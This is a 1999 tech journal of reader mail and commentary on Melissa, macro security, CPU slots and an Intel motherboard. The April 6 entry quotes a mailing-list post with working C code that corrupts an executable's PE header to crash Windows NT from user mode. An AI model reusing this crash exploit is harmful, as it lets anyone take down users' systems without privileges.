Week of 4/5/99
Sunday, April 11, 1999 09:30
A (mostly) daily
journal of the trials, tribulations, and random observations of Robert
Bruce Thompson, a writer of computer books.
April 5, 1999
If you didn't read the updates last weekend,
check back to last week. I posted quite a lot
of interesting new stuff Saturday and Sunday.
* * * * *
pair Networks posted the following message on their support
forum notice board:
- [Apr 3, 1999, 6:08 pm] UUnet routing
We have confirmed that there are problems in UUnet's
local routing mesh, and that their network engineers are working now
to correct it. This affects a small number of networks and ISPs whose
route to us is unavailable. However, the problem seems to be not very
widespread, and only affecting a handfull of ISPs at this time. We
will post more details as they become available.
Anyone who is unable to reach us via web or
telnet is encouraged to send traceroute results to firstname.lastname@example.org
demonstrating their problems. While we are unable to correct this
ourselves, this information may be usefull in our contacts with UUnet
in resolving this issue.
Over the last several days, I have received messages from Bruce Denman,
Bo Leuf, and others reporting slow response or inability to get to this
web site. If you have been experiencing problems getting to this site,
please do a tracert and send the results to the address given above.
* * * * *
The Register ran a report
yesterday that stated that Intel was abandoning the Slot 1 platform in
favor of Socket 370. I find that hard to believe. I can easily believe
that they'll abandon Slot 1 for the Celeron line, but I expect them to
continue Slot 1 for their high-end stuff. I'll believe they're abandoning
Slot 1 entirely when I see Intel announce Socket 370 multi-processor
motherboards and PPGA Xeons. Until then, I think reports of the demise of
Slot 1 are greatly exaggerated.
* * * * *
This from Bruce Denman:
Greetings again. Glad all seems well at your
end but as of right now (Sunday, bout 1:40pm EDT) I cannot get to your
site (or Toms or Pair). Also had similar problem late yesterday
afternoon/evening. Tracert just times out as before. I did a bit of
searching using dogpile; finally ended up at www.alter.net (duh) where
one gets uunet; so; appears one and same.
I got that reference to MSIE 5 from my win
98 listserv. Anyway, I downloaded the change; installed it and now have
it running. I see no obvious difference (version numbers changed). My
d/l was 12MB supposedly but went quick. Others reported it faster too.
Got me. Anyway; whatever it changed is a mystery (my guess..minor bug
fixes). Did not show up on Windows update either.
Last, hope your having fun with
According to pair Networks, UUNet (AlterNet) is having some
routing problems that are making users of some ISPs unable to get to pair
Networks sites. I've been able to get to my site with no problems since
those I reported several days ago. I forwarded the screen shot you did of
the tracert on to pair Networks, so we can hope they press UUNet to get
As far as IE5, I still haven't attempted to download the
updated version. I suspect the reason your download seemed so fast was
that IE5setup lies about how much it will download. I found this out
myself when I decided a week or so ago to download the
"official" Microsoft version to replace the C/Net distribution
files on my disk. I configured all the checkboxes to download the modules
I wanted, and told it to start the download. It reported that it needed to
download 19 MB. I clicked OK, expecting to be downloading for several
hours. Instead, the download status bar moved quickly to the right and IE
reported that I had downloaded the update at the rate of 867 KB/s. Only
with Microsoft software can you get Ethernet-like throughput on a dial-up
line. Obviously, it had noticed that many of files were already present on
my drive, and had simply downloaded a few small files.
* * * * *
This from Bo Leuf:
It’s a passing bother, the junk email. I
still use Pegasus for some regular mail, so I generally check the
headers on the server first and delete the spam before deciding which
mail goes where, i.e. Pegasus or Outlook pickup. Mail is still much of a
batch-proposition when using a POST dial- up ISP, so the extra header
check is a minor detail.
Melissa does otherwise nicely point out the
risks of MS-monoculture software, especially when such glaring security
issues are created by the way the software is designed.
"Bo Leuf" email@example.com
Leuf fc3 Consultancy
I've noticed a slight increase in my own junk mail lately.
Interestingly, I get essentially zero junk mail addressed to some of my
very public accounts, such as firstname.lastname@example.org.
I assume that junk mail address parsers are smart enough to realize that
such addresses are not worth mailing to.
As far as Melissa, I had the same thoughts. Interesting how
software parallels life. Many people are concerned about monoculture in
agriculture for similar reasons. Everyone now grows the same wheat and the
same pigs. In the past, a disease that affected one or another variant of
a crop would have limited effect because other variants would be
resistant. Nowadays, if a virus arises that affects wheat, it's going to
affect essentially the entire crop.
* * * * *
The following three messages are all from joshua [email@example.com]:
One thing that I have been contemplating for
my personal web site (which can be managed almost completely from
nothing but a web browser) is adding an option so all my writing get
emails to my readers, instead of them checking my site constantly for
what is really only sporadic writing.
Anyway, you site isn't sporadic. But, I find
that I don't really like taking the time to wait for the handful of web
sites that I check routinely to load in my browser. So, borrowing a
concept from a company that I worked for that maintains to intranet
servers, one that holds the actual content, and one that contains the
devel stuff, and other info of interest to IS, I started working to
split my current home web development system into two. One part is my
same old development system, but the other part is my homebrew
subscription system (it's written in perl). It doesn't do much fancy
parsing or anything like that (this is were XML will really be great,
for developing custom content instead of trying to write a new parser
for each web site). It just downloads the page, and puts a link to it
off my main web page. So every night at 3 AM, my linux server dials out
to the internet, collects any new email, sorts it out by mailing list,
syncs my home news server with the net, and downloads some of my
favorite web pages. Soon, it will parse them, and just present the
relevant bits all in one page.
Anyway, the point of this long and drawn out
(but I hope interesting) email, is that maybe your readers would like to
have updates emailed to them automatically (if this is something you can
implement with out too much trouble).
At one point, I thought about doing email subscriptions,
but that would just be one more thing to do in a schedule that's already
full and overfull. Yours is actually the first message I've ever gotten
suggesting that, however. If there's a substantial amount of interest in
the idea, I may reconsider it. For the time being, however, I just can't
do much more.
* * * * *
Sorry to email you again just 1 min later
You talked on 3/25 about how much easier it
is to modify the adapters than it is to modify the Celeron chip, like
was needed for Slot 1 Celerons.
Well, there is an even easier method. www.computernerd.com
has custom made adapters with SMP already enabled.
One friend was talking about ordering a
$2000 P3 system to run NT, since he couldn't build one for much cheaper.
While he probably could have I didn't dispute that. Instead, I walked
over to a computer on the web, and stepped him through building a SMP
celeron system with more ram, Ultra SCSI drives and dual 19"
monitors for less. While dual monitors wouldn't help the guy much, it
really drove the point home to him. And despite your views on SCSI, it
just feels faster than even Ultra DMA. Even my mother noticed the
difference without being told what it was. She uses a p90 with 48megs of
ram and a 4gig ultra scsi drive hooked up to and Adaptec 2940 (I know,
the card is only Fast SCSI 2).
How interesting. I am always a little concerned by sites
with a lot of spelling errors ("SMI-6905" rather than
"MSI" and "GPA" rather than "PGA"), but this
is indeed an easy way to a dual Celeron system for those who are
uncomfortable making the modifications themselves. I note that the site
mentions that improved slockets should be showing up in the next few weeks
that will be jumper-settable for single/dual operation and core voltage. I
must say, though, that $25 for an unmodified (single CPU) slocket seems a
bit pricey, as does $35 for the modified version. I mean, these things
can't cost more than a couple of bucks to manufacture. A lot of
motherboard manufacturers are throwing one in the box with every new
motherboard. I notice that this company also provides full dual-Celeron
systems, including ones built around the excellent EPoX motherboards.
* * * * *
I really should have just kept one message
open to send everything at once. Sigh. Anyway, this time I talk about
Mostly this is in response to Dave Farquhar
I disagree that the person who thought that
Word should have something as powerful as WordBASIC should be
keelhauled. For starters, WordBASIC has been merged into the whole
Visual Basic for Applications (VBA) thing, so this isn't really a
WordBASIC virus. I got my start as a professional programmer working in
the Excel and VBA. I wrote a script that helped manage a large payroll
system in Excel. I've also written scripts that do merges between excel
and word so that they could store excel tables in a database application
that hooks onto work, but doesn't like excel. In Access I wrote scripts
that call dlls so that Access can automatedly FTP files off the main
frame, and before that to call the Common Dialog for opening files
(Access isn't really meant to be importing large dataset, in this case
60 some megs, daily). And I've done stuff in Access that loads files out
of Access into Word, and then triggers a Word script to format that data
and push it into Publisher.
Anyway, the point is that there is a reason
to have such power features there. On a corporate level they are
completely appropriate. However, they should be disabled for home users
(we really need an Office Personal package I think), and system admins
aren't doing their jobs properly if they don't know how to fight things
like this, because if it ain't Word, then it is going to be someone
I realized the potential long ago, and have
be warning people for a long time to not open attachments that they
weren't expecting. And I'm not the only one. This highlights another
problem that people don't like to actually respond until an epidemic
breaks out. IE4 is so riddled with security holes (but usually not such
simple to exploit one) that I am just waiting for computers with IE4 to
just start reformatting spontaneously.
On linux when a security hole is mentioned,
it gets fixed quickly, usually before it gets exploited (but not
always). This is one of the major benefits of Open Source. There is no
where to hide your problems, so there is no reason to try and cover them
up. Besides if you do try to hide them, then someone else will just
release a patch, and possibly rip control of the project from you (since
who controls the project is a matter of trust, not just who started it).
Anyway, just food for thought.
Good points. In particular, I wish Microsoft would listen
to your suggestion that such things as WordBASIC be disable-able. Better
still, I should have the option at install time as to whether or not to
install such functions. So long as it's there, it's going to be a problem.
And not just novices get bitten.
Pournelle and I have both taken a great deal of abuse from
people for allowing ourselves to be victimized by Melissa. The messages
usually start out something like, "How could you be so stupid?"
Well, Pournelle's not stupid, and neither am I. Each of us has more than
20 years' experience with computers, and each of us is fully aware of the
dangers of macro viruses.
Jerry got the Melissa message from someone he knew and
trusted. It was from a PR agency, and PR agencies commonly use all sorts
of bells and whistles to promote their products. He figured the document
used macros for that purpose. I got the message from Pournelle. Again, we
exchange Word documents frequently, and it's not uncommon for him to send
me a copy of a column he just finished, with a note saying "please
don't show this to anyone else." So I didn't think much about the
message, although the macro warning gave me a moment's pause.
Those who think that only stupid or ignorant people are at
risk of macro virus infections are missing the point. Certainly, stupidity
and ignorance help these things spread, but at root Melissa depended on
abusing trust. Jerry trusted the PR agency. He had no reason not to. I
trusted Jerry. I had no reason not to. And I'll continue to trust Jerry,
although I will admit that the next time I get a macro warning from Word
I'll open the document first with macros disabled.
Statistically, like any husband, I'm at greatest risk of
being murdered by my own wife. We have guns all over the place here. All
of them loaded, and many of them cocked and locked. I suppose if I
considered the statistics, I'd wear my Second Chance Z9 bullet-proof vest
around the house and sleep alone in a locked room. But I don't, because I
trust my wife. I'm not a particularly trusting person in general, but if
you can't trust your family and friends, who can you trust? Melissa took
advantage of that trust by spoofing mail from someone I had cause to
trust. That was the truly evil thing about it.
* * * * *
This from Gary M. Berg [Gary_Berg@ibm.net]:
One thing to consider is how much of the
Word user interface stuff is written in VBA. Obviously all of the
document templates use macros, but I'd suspect that a significant
portion of Word is actually implemented with VBA.
One thing that MS _could_ do is to have an
option to automatically load documents with macros disabled. So that a
user could set this once and then never have to worry about deciding
when prompted to enable/disable macros. They would have to execute a
command to enable the macros.
The other thing that MS could do is that
when I have the MS Word viewer installed when I load Word97/Office 97 is
to not disable it, but instead ask me if I want to use the Word viewer
as the default document viewer. This would use the viewer when I
double-click on an attached document in mail. Perhaps this should be an
option at install time. I tried to do this, but the Office 97 install
overwrote the Word (and Excel and PowerPoint) viewer parameters in the
I confess that I never considered that WordBASIC/VBA was
anything but a sophisticated and powerful scripting add-on for Microsoft
applications. If you're correct that it's an intrinsic part of Word and
other MS apps, that does make the problem more challenging. Some might go
so far as to call it a design flaw.
Your point about permanently disabling macros is a good
one. In other Microsoft products, one is often given the option to enable,
disable, or prompt. With Word, Microsoft gives us the enable and prompt
options, but no disable option. And your point about being able to specify
a default viewer is also an excellent one.
This whole idea of associating filename extensions with
applications is long obsolete. There's absolutely no reason to continue to
depend on this kludge. The source application for each document could be
identified either by filesystem tracking (for locally created documents)
and/or by an embedded flag in the document itself. When the OS does a file
open, it could determine which application to load that document with by
prioritizing, (1) filesystem source application data, if present, (2)
embedded flag, (3) extension, and (4) prompt user for application. It'd
also be nice if Microsoft applications gave you an "Open
With..." choice on the context-sensitive menu without having to do a
Shift before the right click.
* * * * *
I notice that I used the word "sophisticated". It's
interesting how usage over the years allows words to change meanings,
sometimes to the extent that they become nearly opposite in meaning to the
original usage. Nowadays, sophisticated has a positive meaning.
Originally, sophisticated was a synonym for adulterated. Similarly, the
word "cute" has come to mean attractive, where originally it was
a synonym for bowlegged.
April 6, 1999
Lots of interesting mail today, which is fortunate because I'm too
tired to invent anything interesting to write about.
* * * * *
My friend Paul Robichaux forwarded this message from a mailing list he
subscribes to. What's disturbing about this is that it can be run without
special privileges in user mode (versus kernel mode). You're not supposed
to be able to do something like this in user mode, and certainly not as a
non-privileged user. It looks like Microsoft needs to go back to the
drawing board on this one:
This is fun.
X-Sender: "Jussi Lahdenniemi" firstname.lastname@example.org
Date: Wed, 31 Mar 1999 12:56:57 +0300
Reply-To: Jussi Lahdenniemi jl@VVF.FI
Sender: Windows NT BugTraq Mailing List NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
From: Jussi Lahdenniemi jl@VVF.FI
Subject: BSOD in user mode
the following program causes NT kernel to
bugcheck. It does not need any special privileges and can be hidden
easily. Mainly usable in trojan horses, probably.
Anyhow, the NT's PE loader seems to crash
when the Load Configuration Directory pointer in the executable header
is illegal. Tested with NT4/SP4 and NT5 beta 2. Windows 95 and 98 do not
void main( void )
char me[MAX_PATH], tpath[MAX_PATH], tname[MAX_PATH];
DWORD x, foo;
if( MessageBox( NULL, "Do you want to crash your NT?",
MB_ICONQUESTION | MB_YESNOCANCEL ) != IDYES )
GetModuleFileName( NULL, me, 256 );
GetTempPath( 256, tpath );
GetTempFileName( tpath, "foo", 0, tname );
CopyFile( me, tname, FALSE );
h = CreateFile( tname, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING, 0, NULL );
SetFilePointer( h, 0x3c, NULL, FILE_BEGIN );
ReadFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
SetFilePointer( h, x + 0xc8, NULL, FILE_BEGIN );
x = 0xba6defdd;
WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
CloseHandle( h );
GetStartupInfo( &sui );
CreateProcess( NULL, tname, NULL, NULL, FALSE, 0, NULL,
NULL, &sui, &pi );
Jussi Lahdenniemi, Virtual Visions Finland email@example.com
Hermiankatu 6-8C tel +358-50-3591405
33720 Tampere fax +358-3-3186100
Paul Robichaux | firstname.lastname@example.org | http://www.robichaux.net
Robichaux & Associates: programming, writing, teaching, consulting
* * * * *
This from MITCHELL ARMISTEAD [email@example.com]:
A quick thought,
A macro virus has to execute.
The macro has to execute automatically, to
prevent the User from stopping it.
Word, and other Office products,
automatically execute a Macro with a certain name (AutoExec, Auto_Open,
Macros have a valid function, in that they
allow each user to modify the program to their particular needs. From
the automation of tasks, to custom mini-applications. The problem is the
Wouldn't the solution here be to allow each
user to specify the name of the macro to execute automatically. A
document could have any number of attached macros, only they would never
run. You would just have to avoid a default.
Yes, that's certainly another macro feature that Microsoft
should provide. I'd still like the ability to disable macros entirely,
* * * * *
This from Chuck Waggoner [firstname.lastname@example.org]:
Your virus discussion is intriguing,
although it deals mostly with Word. During the middle of last week, I
got hit--by what, I don't know,--but I think it came in through IE4.
I never use the desktop; I only see it
during my daily reboot of Win98 (which will only run about 48 hours
without going berserk). Strangely, on Thursday, a half-screen picture of
a toilet appeared as a background tile. Obviously this was a prank, but
very disturbing. I did not have tiles activated, so whatever this was,
could get into my background setups and make changes.
I visit a limited number of sites, and was
much too busy doing my Schedule C to do any surfing last week. Which
makes Joshua Boyd's comment about IE initiating a disk format all the
Nevertheless, I can't agree with the general
opinions expressed that certain elements of programs should be disabled
because some small minority might use them to cause trouble. In my
opinion, that represents discrimination against a large majority of
users, regardless of their expertise, who have no motivation or
intention of causing mischief. To me, it's not much different than those
who advocate gun control--yes, people are killed by guns everyday, but
those who are serious about committing a crime, are going to get hold of
a gun one way or another. When I lived in Chicago working in the media
during the '80s, the pro-gun lobby there, had the happy fortune of being
able to demonstrate that nearly all crimes with guns in which the
criminal was caught, involved the use of stolen or illegally obtained
It also bears some relation to the actions
of our city's mayor, who, when two years ago, was faced with a park
bench which had the seat slats smashed near our city's downtown pond,
related afterward that the bench will never be repaired as long as he is
the mayor. Good idea: punish residents of the entire city, for actions
of what was probably one or two ingrates.
Punishing the masses of computer users by a
determination that they have no business employing certain features and
therefore should not even have access, does not sound like liberty. In
fact, denying feature access, and especially making large groups suffer
for crimes of the few, sounds to me more like an invitation to
Well, that's a truly frightening experience. It used to be
that, in a fundamental sense, we could know what our computers were doing.
That's no longer the case, and hasn't been for years. I remember the first
time I loaded Xenix on a Compaq PC in 1986. I was sitting next to the PC
doing something else when the drive started clattering and the access
light flickered. The thought struck me then that I had no idea what my
computer was doing at that moment, and it disturbed me. Nowadays, I have
no idea what my computer is doing most of the time. That's not good, I
suppose. We've traded a lot for a GUI and convenience. Now we're getting
to the point where the PC can do dangerous things without our being aware,
let alone giving our permission.
As far as the disabling issue, unless I've misread what's
been said, I don't think anyone was suggesting that macro capabilities be
eliminated from products. Just that what they do, how they do it, and when
they do it be under the complete control of the owner of the PC. I'd like
the option to choose whether or not I want to install macro features. I
don't use them, at least not directly, and it'd be nice to have the choice
of not having them there cluttering things up. If you use them, you should
certainly have the option to install them. In a corporate environment,
whether or not to disable those features might be a matter of policy. For
individuals, I think it's a pretty generally accepted principle that
safety should take precedence over convenience or available features, so
shipping such products with macro features disabled might be a good idea.
The manufacturers could always mention what they'd done in case a user
wanted to turn those features back on.
As far as the gun control analogy, you'll never encounter
anyone who's more pro-gun than I am. As I read it, the Second Amendment
guarantees even convicted felons the right to keep and bear nuclear
weapons. But I'm not sure how making macros disableable relates to the
Right to Keep and Bear Arms.
* * * * *
This from Bo Leuf [email@example.com]:
Spotted this in the evening’s news.
Traditional rights eroding further?
A divided U.S. Supreme Court Monday gave police broad new powers to
search a passenger's personal belongings inside a car suspected of
The high court, by a 6-3 vote, ruled that officers may inspect a
passenger's purse, briefcase or other personal items if they have
sufficient grounds to search the car.
Continuing a trend in recent years by the court's conservative majority
to expand police powers to search and seize evidence, Justice Antonin
Scalia said in the ruling the passenger's constitutional privacy rights
were not violated.
In the car search case, Scalia said ``passengers, no less than drivers,
possess a reduced expectation of privacy with regard to the property
that they transport in cars.''
He said the constitutional right against unreasonable searches would not
bar the search and a court warrant would not be needed as long as the
police had sufficient reason to believe the car contained illegal
``Effective law enforcement would be appreciably impaired without the
ability to search a passenger's personal belongings when there is reason
to believe contraband or evidence of criminal wrongdoing is hidden in
the car,'' he said.”
Yeah, I'd call that an erosion. Warrantless searches of any
sort are prima facie unconstitutional, viz.
"The right of the people to be secure in their persons, houses,
papers, and effects, against unreasonable searches and seizures, shall not
be violated, and no Warrants shall issue, but upon probable cause,
supported by Oath or affirmation, and particularly describing the place to
be searched, and the persons or things to be seized. "
The problem, of course, is that the Supremes "interpret" things
that don't need to be interpreted. The latest attempt to get around
constitutional safeguards is their interpretation of
"unreasonable." In a literal sense, as it was intended,
"unreasonable" means "without reason", i.e. without
evidence that a crime has occurred. Now they're attempting to redefine a
cop's suspicion as being grounds for a "reasonable" search.
That, of course, eliminates the safeguard entirely, since any cop can
suspect anyone of anything at any time. Exactly the situation the Fourth
Amendment was intended to protect us against.
* * * * *
This from Gary M. Berg [Gary_Berg@ibm.net]:
>> If you're correct that it's [VBA] an intrinsic part of
Word and other MS apps, that does make the problem more challenging.
Some might go so far as to call it a design flaw. <<
A friend of mine who was a Word beta tester
said he once did something which basically killed off the whole VBA
subsystem by screwing up an add-in. Lots of stuff failed to work after
that. I would expect that a lot of the user-friendly stuff (wizards and
such) might be implemented in VBA so as to stay away from the core code.
>> This whole idea of associating filename extensions with
applications is long obsolete. <<
There should be some sort of application ID
stored in the file or in the OS filesystem. This is similar to what the
Mac uses? I don't know how to assign it, or how to override what viewer
application should look at it by default instead of the actual creating
application (to keep macros out of our systems).
I can believe that a lot of the bells and whistles in Word
and other Microsoft apps use VB, but I suspect I'd be happy to do without
most of them. As far as the Mac, I don't know much about it, but I believe
it stores files as two forks. The data fork contains the actual data, and
the resource fork contains, among other things, information about the
application that created the file.
* * * * *
This from joshua [firstname.lastname@example.org]:
$25 may be rather pricy for an unmodified
adapter. Is so, then just buy unmodified ones somewhere else. As for $35
being pricy for modified ones, well, even though modifying an adapter is
easier than modifying the chip, I still am not sure that I would want to
trust my own work. Thus for me it is pay $35 for a premade adapter, or
$1000 for dual P2s. At least until another company starts selling
premodified ones for less. Early this summer, I plan to build myself a
new system, and unless someone else starts making cheaper adapters
already modified, I think it is saving me money to just cough up the
cash for the premade ones, and spend the time working that I would have
spent modifying the adapters.
Since you won't be building your system until this summer,
you'll be able to use one of the jumper-settable slockets that MSI and
others plan to release shortly. As a matter of fact, the web site we're
talking about mentions that these new slockets will be available in a few
weeks, and offers to credit most of the price you pay for a current model
on the new model.
* * * * *
This from Louis Cissell [email@example.com]:
I’ve been visiting your sight for several
months now - count me as another bounce from Chaos Manor and someone who
thoroughly enjoys your no-nonsense and information rich style.
I am responsible for two separate networks, one at my wife’s business
with 7 PCs on a win98/3.11 network and another at the print shop where I
work. This one consists of an NT 4 server 5 PCs and 3 Macs. My “training”
is strictly OJT trial and error but so far everything seems to work OK.
I have a question concerning internet hosting and IP numbers. My wife
needs to set up an ftp server fairly soon strictly for private use of
her customers, does this require a domain name or just a static IP
Pacific Bell will soon be offering DSL in her area (3miles from Los
Angeles International Airport) and is has a -Small Business Package-
Dedicated Product - Digital Subscriber Line -of DSL service with 32
static IP addresses for around $200-$300 a month and hosting is allowed
over this service. Can we just set up an ftp server on one IP address or
do we need some kind of “official blessing” to do something like
I’ve spent several hours trying to find relevant info on the net and
have found little, so I thought I’d ask someone who might know.
Thanks for any enlightenment.
P.S. - I love my cable modem.
Thanks for the kind words. To answer the question you
asked, you don't need a domain name to bring up an ftp server. What a
domain name buys you is that users can access the site by name (e.g. ftp.acmebuggywhips.com)
rather than just by IP address. So, if you don't mind people having to
enter the IP address in their ftp clients, a domain name is unnecessary.
You can simply install and configure an ftp server on a static IP address,
populate your ftp directory and let 'er rip. And now to answer some
questions you didn't ask:
Do you really want to run your own ftp server? There can be
good reasons for doing so. For example, the files you serve may be
confidential and you may need to keep them under tight control. But if
that's not the case, you might be better off signing up with a hosting
company. For anything from $5 to $25 per month, you can get your ftp site
hosted (and your web site, for that matter) by a company that specializes
in doing this. If that $200 to $300 is significantly more than you'd pay
for an ADSL link with a single static IP address (or even one with a
dynamic IP address), you may want to reconsider whether you want to pay
the extra money to run local servers. For that matter, one static IP
address is all you need to run local servers, so there's no point in
paying for 32 static addresses if the service with just one static IP
address is cheaper.
If you decide to run a local ftp server, what are you going
to run it on? Although I'm sure there are ftp server packages available
for Win9x, that's probably not what you want to do. Realistically, the
best choice would be a Linux or BSD box, and next-best would be a Windows
NT Server box. Setting up and managing an ftp server is not particularly
difficult, but you will need the operating system, software, and someone
who has the knowledge (or the time to develop it) to administer the site.
Are you prepared to secure your site? If you run a local
ftp server with a full-time Internet connection, you'd better be sure you
have things locked down tight. Otherwise, don't be surprised to find that
an intruder has hacked into your network. Actually, it's not the ftp
server that's the important part. One of the aspects of full-time Internet
connections that's been widely ignored is the security threat they pose. A
couple of years ago, only corporations were at risk from this, but
nowadays anyone with a cable modem or ADSL link at home is also at risk.
* * * * *
This from joshua [firstname.lastname@example.org],
responding to several other threads:
Statistically, like any husband, I'm at greatest risk of being
murdered by my own wife. We have guns all over the place here. All of
them loaded, and many of them cocked and locked. I suppose if I
considered the statistics, I'd wear my Second Chance Z9 bullet-proof
vest around the house and sleep alone in a locked room. But I don't,
because I trust my wife. I'm not a particularly trusting person in
general, but if you can't trust your family and friends, who can you
trust? Melissa took advantage of that trust by spoofing mail from
someone I had cause to trust. That was the truly evil thing about it.
And yet you don't know whether it is really
Pournelle or not on the other end of the email, where as you do know
your wife when she calls. But what if it was a telegram from her? How
would you be sure than? Preventing things like this is one of the goals
behind public key encryption and signature systems like PGP. A program
like Melissa may be able to send you email from Pournelle, but it can't
properly sign it for him. Just like someone can send you a telegram
pretending to be your wife, but it is pretty darn hard to do a good job
signing her signatures.
In responce to your comments on Gary M.
Bergs letter, yes, Word does use VBA extensively itself. The whole menu
system uses VBA, which is why it is so easy to customize it. All menu
ideas are just records in a database that tell it what macro to call.
Sometimes that macros are just a call to a built in function, and
sometimes they are more. Also, templates use VBA. I wouldn't call it a
design flaw, anymore than I would call the fact that emacs is
extensively written in it's built in lisp is a flaw. It is just an
extremely powerfull way of doing things, and one that needs better
control, like options to run code in templates, but not normal Word
files or incoming email. Those are options that emacs offers for
security so that people can sneak a lisp virus into email being red by
In regards to using file xtensions to decide
which application to use. I can think of only two operating systems that
don't work that way, MacOS, and BeOS. MacOS embeds a 4 letter tag into
the document that it uses to decide what to use to open the file. If you
think about it though, it isn't much different from having a 4 digit
extension, except you can't see it, and it is a pain to change. Worse,
the same file type's tag is set by the program that creates it. So if I
write out a jpg from photoshop, photoshop is always going to be the
program that is run when I double click on the icon, even if I usually
want to image to be loaded into a catalog program instead.
BeOSs system is slightly more advanced,
thanks to their object oriented file system. It still relies on file
extensions most of the time, but it doesn't have to. A program can
create a file type to have data stored with it in addition to it's main
data area. This is how the address book system works. Each person in it
actually has their own file in the proper folder, and any program can
examine this data. I beleive that BeOSs file system has much potential,
but currently, BeOS is even less ready for end users than linux in many
ways (although it is easy to get it working in the first place). I'm a
registered developer for Be, but I have to admit that I like linux
better. When ever I use BeOS I feel I am being nickled and dimed because
you have to pay for every single program just about, to an extent even
worse that MS land. Further, I'm finding that I don't like closed source
system libraries, because I like to be able to browse through the source
code to see how things are supposed to relate to each other when I am
have problems. Their documentation just doesn't provide the same clear
view that browsing through the code for those libraries would.
Using file extension to determin type isn't
really a bad idea, if all data can be read by all applications, and on
unix systems, that is frequently the case. My word processor (emacs to
write text, latex, and html files, depending on the level of formating
needed for the doc) produces files that can be parsed out by most other
programs. My spreadsheet (siag, which uses the scheme programming
language for cell calculations, and can store in a slew of text formats)
also uses a text system. Obviously my source code is all text. The major
exception is picture data.
Universally read files was supposed to
become a reality with XML (and before that with SGML, but SGML was just
too difficult). Office 2000 was supposed to write and use XML files (you
are the one who has Office2K, I don't), and if a program had trouble
with a set of XML tags, it could call on another library through CORBA
or OLE (depending on platform) to help it, or it could just ignore that
section. Thus databases, word processor documents, Illustator drawings,
spreadsheats, accounting systems, tax systems, and PIM softare all use
the same extension, .xml.
Good points, all. One thing, though. PK encryption/signing
wouldn't necessarily have helped with Melissa. Because it took control of
Pournelle's copy of Outlook, it could easily have signed the outbound mail
with his signature unless, like PGP, the encryption software doesn't store
the private key but requires the user to enter it manually. And actually I
don't have Office 2000. I'm not sure I'll upgrade to it, either.
* * * * *
This from Jan Swijsen of The Netherlands, who asks that his address not
I'll believe they're abandoning Slot 1
entirely when I see Intel announce Socket 370 multi-processor
motherboards and PPGA Xeons. Until then, I think reports of the demise
of Slot 1 are greatly exaggerated.
I think this does looks logical, from an
Intel point of view. With the new trend of putting L1 cache on the
processor die itself the advantage of a slot over a socket is mute for
relative low end products. For the real high end stuff they have
Slot-2 ready (Xeon on SC330) and for the 'low' end they have the Socket
370. Both of these are proprietary. Read no AMD and no Cyrix. .
Slot-1 is, via strange licensing paths,
available to Cyrix and the Jalapeno is supposed to become available in
Slot-1 format. AMD has a 'Slot-1'like technology, Alpha EV6 buss
licensed from Digital who developed it for their Alpha, available and
ready to roll. This is physically the same as the Intel Slot-1 and could
be supported on a mother board with suitable chip set. Maybe via a BIOS
switch selecting between Intel Slot-1 and Alpha EV6.
Intel has the competition wrong footed,
again, so now is the ideal time to drop a standard and put in a new one.
We will see multi processor boards using
Socket370 soon enough, if not from Intel. What I am wondering is how
long it will take before we see Slot-1 modules with two Socket370 or
Socket7 chips. It must be possible to do and it would provide some
serious power, especially for upgrade board. How many people would jump
to upgrade a PII 266 with 2x 400Mhz Celerons or even 2x AMD K7 !!
ps I discovered your site through Jerry
Pournelle. ( I also found Tom Syroid and Bo Leuf through his site. All
four now have a place on my own home page!) I use the '11f' code that he
requests for stuff that may (but doesn't have to) be posted.
Good points. I actually got to thinking after I posted that
remark that perhaps I should fix it before people asssumed that I thought
Xeon CPUs fit Slot 1. Parenthetically, I notice that Intel no longer
manufactures any Slot 1 or Slot 2 motherboards or processors. They now
refer to them purely by the number of contacts, e.g. "the 242-contact
connector (previously known as Slot 1)".
A dual slocket would indeed be an interesting device,
although I'm not sure that it's theoretically possible for Intel
processors. I understand that the K7 will support SMP via direct connect,
so that might be doable, although it would be one whopper of a card.
April 7, 1999
We've finished preliminary testing and evaluation on the Intel
BI440ZX system board. This miniscule (9.6" X 9.6") Micro-ATX
system board is not intended for power users. It provides one AGP slot,
two PCI slots, and one shared ISA/PCI slot. It uses the 440ZX/66 chipset,
and provides no overclocking options. But none of that is really relevant,
because this board is not designed to compete in the hobbyist/overclocking
For its intended purpose--the foundation of an inexpensive, top-quality
Basic PC--this is a superb board. Its layout and construction quality are
up to Intel's usual high standards. One sign of a top-notch motherboard is
that the manufacturer sweats the small stuff. It's evident in every aspect
of this board that Intel has done just that. Something as simple as the
fact that they label each side of the board with co-ordinates to allow you
to locate components much as you might locate a city on a road map by
looking for square G7 indicates that Intel has thought things through
fully for this board.
Although the board is tiny, it is solidly built and very well laid out,
with everything readily accessible. The header pin front panel connectors,
which appear on the front edge of the system board on most ATX boards, are
located a couple of inches in from the front edge of this Micro-ATX board.
Although this appeared strange at first, we found it actually made it
easier to make connections. The CPU socket is well protected by five large
capacitors and two ferrite inductors. We're used to the huge heatsinks
used with the 440BX chipset, so we were surprised to see that the 440ZX/66
chipset has no heatsink and is simply a largish surface mount chip.
Although this is a small board, it contains a full complement of
connectors. In addition to the standard IDE and floppy connectors, there
are fan power headers for the CPU and system fans, ATAPI and legacy CD
audio connectors, and (rather surprisingly) a Wake-on-LAN connector. The
back panel includes two interchangeable mouse/keyboard PS/2 ports, two USB
ports, an ECP/EPP printer port, a game port, the three standard audio
ports (line in, line out, and mic), and, mirabile dictu, two
9-pin serial ports, so you can use both your external modem and your
PalmPilot cradle without swapping cables. Intel sells this board in many
configurations, some with fewer connectors and some with many more.
Installation is smooth, aided by automatic everything and a streamlined
BIOS setup. As has become common industry practice, Intel includes only an
overview pamphlet rather than full printed documentation, but the complete
manual is available on the included CD-ROM. We did our preliminary testing
with a PPGA Celeron/400, which was the only Socket 370 processor we had
available. This made benchmark comparisons impossible, but the system
definitely "felt" like a 400 MHz system. But benchmarks are of
little significance on Intel-based systems nowadays. Socket 7 motherboards
that use different chipsets often differ widely in performance. Even
different Socket 7 motherboards that use the same chipset can perform very
differently. But performance variations among boards that use Intel
chipsets are minimal. Any competent 440BX-based board, for example, will
likely benchmark within a few percent of any other BX-based board.
Although we will be unable to benchmark the performance of a Slot 1
Celeron in a 440BX motherboard against the performance of a Socket 370
